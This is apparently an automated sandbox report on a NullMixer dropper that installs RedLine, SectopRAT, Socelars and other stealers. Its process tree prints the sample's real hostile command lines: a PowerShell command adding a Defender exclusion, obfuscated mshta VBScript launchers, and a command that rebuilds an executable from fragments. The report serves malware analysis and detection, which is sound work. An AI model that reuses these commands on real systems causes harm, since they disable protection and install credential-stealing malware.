Analysis Overview
SHA256
46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308
Threat Level: Known bad
The file 46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe was found to be: Known bad.
Malicious Activity Summary
PrivateLoader
SectopRAT
RedLine
Fabookie family
Socelars payload
RedLine payload
Fabookie
Socelars
NullMixer
Sectoprat family
Socelars family
Privateloader family
SectopRAT payload
Onlylogger family
Nullmixer family
Gcleaner family
GCleaner
Redline family
Detect Fabookie payload
OnlyLogger
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
ASPack v2.12-2.42
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Looks up external IP address via web service
Drops Chrome extension
Looks up geolocation information via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Browser Information Discovery
System Location Discovery: System Language Discovery
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 21:35
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 21:35
Reported
2024-11-24 21:37
Platform
win7-20240903-en
Max time kernel
5s
Max time network
121s
Command Line
Signatures
Detect Fabookie payload
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Socelars
Socelars family
Socelars payload
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe | N/A |
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe
"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ee0a6fe195bd09.exe
Fri20ee0a6fe195bd09.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe
Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209d5bfbb2.exe
Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20109b9e174d0fc.exe
Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20e095683c2b3a0c.exe
Fri20e095683c2b3a0c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2002ce5f91c761.exe
Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe
Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe
Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209f6924af86d795.exe
Fri209f6924af86d795.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe
Fri20d5530575e8aa3ed.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20c0c46650eeb2a.exe
Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe
Fri208f5f140853548.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri200ae385720d3.exe
Fri200ae385720d3.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2060ea1c5d8fae8aa.exe
Fri2060ea1c5d8fae8aa.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 272
C:\Users\Admin\AppData\Local\Temp\is-71TVF.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-71TVF.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$301C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$401C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Fri208f5f140853548.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM "Fri20ba391d4469.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 "=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 480
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct( "WscRiPt.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT +lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT+lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"
C:\Windows\SysWOW64\msiexec.exe
msiexec /Y .\6~iPCLZ.rJ
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libwinpthread-1.dll
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libcurlpp.dll
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libcurl.dll
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libgcc_s_dw2-1.dll
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libstdc++-6.dll
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ee0a6fe195bd09.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri200ae385720d3.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209f6924af86d795.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209c4b463b.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20e095683c2b3a0c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp
C:\Users\Admin\AppData\Local\Temp\is-PMFSC.tmp\_isetup\_shfoldr.dll
C:\Users\Admin\AppData\Local\Temp\is-PMFSC.tmp\idp.dll
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 21:35
Reported
2024-11-24 21:37
Platform
win10v2004-20241007-en
Max time kernel
15s
Max time network
121s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2776 set thread context of 4984 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
